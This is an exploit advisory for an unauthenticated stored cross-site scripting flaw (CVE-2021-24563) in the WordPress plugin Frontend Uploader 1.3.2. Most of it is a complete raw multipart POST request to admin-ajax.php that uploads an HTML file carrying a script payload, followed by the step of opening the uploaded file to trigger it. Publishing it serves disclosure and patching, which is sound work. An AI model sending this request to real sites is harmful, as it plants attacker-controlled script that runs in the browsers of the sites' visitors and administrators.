WordPress Frontend Uploader 1.3.2 Cross Site Scripting

`# Exploit Title: WordPress Plugin Frontend Uploader 1.3.2 - Stored Cross Site Scripting (XSS) (Unauthenticated)  
# Date: 10/01/2022  
# Exploit Author: Veshraj Ghimire  
# Vendor Homepage: https://wordpress.org/plugins/frontend-uploader/  
# Software Link: https://plugins.trac.wordpress.org/browser/frontend-uploader/  
# Version: 1.3.2  
# Tested on: Windows 10 - Chrome, WordPress 5.8.2  
# CVE : CVE-2021-24563  
  
# References:  
  
https://www.youtube.com/watch?v=lfrLoHl4-Zs  
https://wpscan.com/vulnerability/e53ef41e-a176-4d00-916a-3a03835370f1  
  
# Description:  
  
The plugin does not prevent HTML files from being uploaded via its form, allowing unauthenticated user to upload a malicious HTML file containing JavaScript for example, which will be triggered when someone access the file directly  
  
  
# Proof Of Concept:  
  
  
POST /wp-admin/admin-ajax.php HTTP/1.1  
  
Accept:  
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
  
Accept-Language: en-GB,en;q=0.5  
  
Accept-Encoding: gzip, deflate  
  
Content-Type: multipart/form-data;  
boundary=---------------------------124662954015823207281179831654  
  
Content-Length: 1396  
  
Connection: close  
  
Upgrade-Insecure-Requests: 1  
  
  
-----------------------------124662954015823207281179831654  
  
Content-Disposition: form-data; name="post_ID"  
  
  
1247  
  
-----------------------------124662954015823207281179831654  
  
Content-Disposition: form-data; name="post_title"  
  
  
test  
  
-----------------------------124662954015823207281179831654  
  
Content-Disposition: form-data; name="post_content"  
  
  
test  
  
-----------------------------124662954015823207281179831654  
  
Content-Disposition: form-data; name="files[]"; filename="xss.html"  
  
Content-Type: text/html  
  
  
<script>alert(/XSS/)</script>  
  
-----------------------------124662954015823207281179831654  
  
Content-Disposition: form-data; name="action"  
  
  
upload_ugc  
  
-----------------------------124662954015823207281179831654  
  
Content-Disposition: form-data; name="form_layout"  
  
  
image  
  
-----------------------------124662954015823207281179831654  
  
Content-Disposition: form-data; name="fu_nonce"  
  
  
021fb612f9  
  
-----------------------------124662954015823207281179831654  
  
Content-Disposition: form-data; name="_wp_http_referer"  
  
  
/wordpress/frontend-uploader-form/  
  
-----------------------------124662954015823207281179831654  
  
Content-Disposition: form-data; name="ff"  
  
  
92b6cbfa6120e13ff1654e28cef2a271  
  
-----------------------------124662954015823207281179831654  
  
Content-Disposition: form-data; name="form_post_id"  
  
  
1247  
  
-----------------------------124662954015823207281179831654--  
  
  
  
Then access the uploaded to trigger the XSS, ie https://example.com/wp-content/uploads/2021/07/xss.html  
`